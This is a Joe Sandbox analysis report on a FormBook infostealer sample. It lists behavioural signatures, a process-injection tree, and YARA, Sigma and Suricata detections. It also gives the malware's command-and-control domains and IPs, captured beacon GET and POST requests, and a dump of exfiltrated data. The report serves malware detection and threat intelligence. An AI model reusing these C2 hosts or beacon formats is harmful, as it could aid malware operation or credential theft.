Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BDlwy8b7Km.exe

Overview

General Information

Sample name:BDlwy8b7Km.exe
renamed because original name is a hash value
Original sample name:9e39a50469e60d2c9d851e9cd2b35c298a5990f1ab1ab57faba228ed32a814f3.exe
Analysis ID:1588891
MD5:95b9d05f97fba1718d8c85967ebffc4c
SHA1:8752f152236cf941e59aff72b182c5afc205927e
SHA256:9e39a50469e60d2c9d851e9cd2b35c298a5990f1ab1ab57faba228ed32a814f3
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • BDlwy8b7Km.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\BDlwy8b7Km.exe" MD5: 95B9D05F97FBA1718D8C85967EBFFC4C)
    • svchost.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\BDlwy8b7Km.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FKUPIibLrFYhJ.exe (PID: 4484 cmdline: "C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • relog.exe (PID: 7676 cmdline: "C:\Windows\SysWOW64\relog.exe" MD5: DA20D543A130003B427AEB18AE2FE094)
          • FKUPIibLrFYhJ.exe (PID: 5552 cmdline: "C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7808 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BDlwy8b7Km.exe", CommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", ParentImage: C:\Users\user\Desktop\BDlwy8b7Km.exe, ParentProcessId: 7300, ParentProcessName: BDlwy8b7Km.exe, ProcessCommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", ProcessId: 7360, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\BDlwy8b7Km.exe", CommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", ParentImage: C:\Users\user\Desktop\BDlwy8b7Km.exe, ParentProcessId: 7300, ParentProcessName: BDlwy8b7Km.exe, ProcessCommandLine: "C:\Users\user\Desktop\BDlwy8b7Km.exe", ProcessId: 7360, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T06:54:42.343238+010020507451Malware Command and Control Activity Detected192.168.2.45002446.38.243.23480TCP
                2025-01-11T06:55:28.274099+010020507451Malware Command and Control Activity Detected192.168.2.44973647.83.1.9080TCP
                2025-01-11T06:55:52.580528+010020507451Malware Command and Control Activity Detected192.168.2.44984247.83.1.9080TCP
                2025-01-11T06:56:06.120981+010020507451Malware Command and Control Activity Detected192.168.2.449928185.151.30.22380TCP
                2025-01-11T06:56:19.683968+010020507451Malware Command and Control Activity Detected192.168.2.450016176.57.65.7680TCP
                2025-01-11T06:56:32.949886+010020507451Malware Command and Control Activity Detected192.168.2.450020209.74.79.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T06:54:42.343238+010028554651A Network Trojan was detected192.168.2.45002446.38.243.23480TCP
                2025-01-11T06:55:28.274099+010028554651A Network Trojan was detected192.168.2.44973647.83.1.9080TCP
                2025-01-11T06:55:52.580528+010028554651A Network Trojan was detected192.168.2.44984247.83.1.9080TCP
                2025-01-11T06:56:06.120981+010028554651A Network Trojan was detected192.168.2.449928185.151.30.22380TCP
                2025-01-11T06:56:19.683968+010028554651A Network Trojan was detected192.168.2.450016176.57.65.7680TCP
                2025-01-11T06:56:32.949886+010028554651A Network Trojan was detected192.168.2.450020209.74.79.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T06:55:44.858916+010028554641A Network Trojan was detected192.168.2.44978947.83.1.9080TCP
                2025-01-11T06:55:47.405795+010028554641A Network Trojan was detected192.168.2.44980547.83.1.9080TCP
                2025-01-11T06:55:49.952696+010028554641A Network Trojan was detected192.168.2.44982547.83.1.9080TCP
                2025-01-11T06:55:58.437669+010028554641A Network Trojan was detected192.168.2.449882185.151.30.22380TCP
                2025-01-11T06:56:00.988683+010028554641A Network Trojan was detected192.168.2.449899185.151.30.22380TCP
                2025-01-11T06:56:03.565517+010028554641A Network Trojan was detected192.168.2.449915185.151.30.22380TCP
                2025-01-11T06:56:12.053749+010028554641A Network Trojan was detected192.168.2.449968176.57.65.7680TCP
                2025-01-11T06:56:14.744445+010028554641A Network Trojan was detected192.168.2.449988176.57.65.7680TCP
                2025-01-11T06:56:17.764973+010028554641A Network Trojan was detected192.168.2.450005176.57.65.7680TCP
                2025-01-11T06:56:25.298946+010028554641A Network Trojan was detected192.168.2.450017209.74.79.4180TCP
                2025-01-11T06:56:27.861751+010028554641A Network Trojan was detected192.168.2.450018209.74.79.4180TCP
                2025-01-11T06:56:30.418867+010028554641A Network Trojan was detected192.168.2.450019209.74.79.4180TCP
                2025-01-11T06:56:39.530934+010028554641A Network Trojan was detected192.168.2.45002146.38.243.23480TCP
                2025-01-11T06:56:42.077713+010028554641A Network Trojan was detected192.168.2.45002246.38.243.23480TCP
                2025-01-11T06:56:44.624617+010028554641A Network Trojan was detected192.168.2.45002346.38.243.23480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: BDlwy8b7Km.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: BDlwy8b7Km.exeReversingLabs: Detection: 70%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: BDlwy8b7Km.exeJoe Sandbox ML: detected
                Source: BDlwy8b7Km.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: relog.pdbGCTL source: svchost.exe, 00000001.00000003.2013167163.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012121245.0000000003013000.00000004.00000020.00020000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000002.3559816137.00000000008F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: relog.pdb source: svchost.exe, 00000001.00000003.2013167163.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2012121245.0000000003013000.00000004.00000020.00020000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000002.3559816137.00000000008F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559491409.000000000068E000.00000002.00000001.01000000.00000005.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3558984084.000000000068E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, BDlwy8b7Km.exe, 00000000.00000003.1729354674.0000000004420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1948138991.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1945997974.0000000003200000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.000000000379E000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2047180919.0000000003455000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.0000000003600000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2044450674.0000000003281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, BDlwy8b7Km.exe, 00000000.00000003.1729354674.0000000004420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2044447122.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1948138991.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2044447122.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1945997974.0000000003200000.00000004.00000020.00020000.00000000.sdmp, relog.exe, relog.exe, 00000006.00000002.3560587819.000000000379E000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2047180919.0000000003455000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3560587819.0000000003600000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.2044450674.0000000003281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3561012961.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2342472948.0000000037D3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: relog.exe, 00000006.00000002.3559238568.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3561012961.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2342472948.0000000037D3C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_005FDBBE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_006068EE FindFirstFileW,FindClose,0_2_006068EE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0060698F
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005FD076
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005FD3A9
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00609642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00609642
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0060979D
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00609B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00609B2B
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00605C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00605C97
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_02EEC330 FindFirstFileW,FindNextFileW,FindClose,6_2_02EEC330
                Source: C:\Windows\SysWOW64\relog.exeCode function: 4x nop then xor eax, eax6_2_02ED9E90
                Source: C:\Windows\SysWOW64\relog.exeCode function: 4x nop then pop edi6_2_02EE5659
                Source: C:\Windows\SysWOW64\relog.exeCode function: 4x nop then mov ebx, 00000004h6_2_035004E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49882 -> 185.151.30.223:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49789 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49825 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49915 -> 185.151.30.223:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49968 -> 176.57.65.76:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49842 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49842 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49988 -> 176.57.65.76:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50005 -> 176.57.65.76:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50020 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49928 -> 185.151.30.223:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49928 -> 185.151.30.223:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49899 -> 185.151.30.223:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50016 -> 176.57.65.76:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50016 -> 176.57.65.76:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50024 -> 46.38.243.234:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.thinkone.xyz
                Source: Joe Sandbox ViewIP Address: 176.57.65.76 176.57.65.76
                Source: Joe Sandbox ViewIP Address: 47.83.1.90 47.83.1.90
                Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0060CE44
                Source: global trafficHTTP traffic detected: GET /ou8k/?TXVlY=nv6XU20pgPTDN0&94=sHhXhPPev91RFxpjPhHA/72AjtyYVyN8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQcFcEZTyl6CSjd+TmOm9tiQhux0BP2yYLzMg1QsJkzQ4A7X5eN3dM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.aoivej.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                Source: global trafficHTTP traffic detected: GET /wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.givvjn.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                Source: global trafficHTTP traffic detected: GET /xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1VgzmTDcFpkSUd31giEOekxs=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.gern.devConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                Source: global trafficHTTP traffic detected: GET /fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.newbh.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                Source: global trafficHTTP traffic detected: GET /b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.thinkone.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                Source: global trafficHTTP traffic detected: GET /ixqi/?94=TN9kbi/KmEXimVSL0ERanCo8EPrJiw0+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyN0TYvIjkiLeGXDgVU6Nef5fP7k6kFQJQYe0=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USHost: www.mraber.devConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                Source: global trafficDNS traffic detected: DNS query: www.aoivej.info
                Source: global trafficDNS traffic detected: DNS query: www.givvjn.info
                Source: global trafficDNS traffic detected: DNS query: www.gern.dev
                Source: global trafficDNS traffic detected: DNS query: www.newbh.pro
                Source: global trafficDNS traffic detected: DNS query: www.thinkone.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mraber.dev
                Source: unknownHTTP traffic detected: POST /wl3x/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.givvjn.infoOrigin: http://www.givvjn.infoReferer: http://www.givvjn.info/wl3x/Content-Length: 199Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeUser-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)Data Raw: 39 34 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 6f 66 39 4c 69 42 69 6d 6f 47 78 51 35 76 54 6b 46 74 51 5a 50 53 51 6e 67 74 74 4d 65 51 68 72 4d 4d 66 6c 50 58 67 79 6d 50 69 52 44 6c 52 70 47 75 35 68 52 2b 48 41 38 64 76 71 33 55 32 54 5a 6f 45 76 75 32 61 4b 2b 72 31 50 79 34 55 4e 7a 64 41 70 4b 71 6d 76 4a 73 41 55 4d 76 42 6f 61 70 34 77 75 72 59 58 4b 53 7a 69 74 59 79 73 48 73 4c 45 77 52 36 41 64 51 73 6b 50 31 4c 65 6f 50 67 67 34 47 31 77 49 64 69 47 63 6a 7a 4f 36 49 78 6e 4e 4e 36 64 42 41 73 7a 34 31 61 6b 39 6f 75 6e 4d 77 42 36 4b 57 34 31 31 30 35 78 46 68 50 62 6e 41 3d 3d Data Ascii: 94=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK+r1Py4UNzdApKqmvJsAUMvBoap4wurYXKSzitYysHsLEwR6AdQskP1LeoPgg4G1wIdiGcjzO6IxnNN6dBAsz41ak9ounMwB6KW41105xFhPbnA==
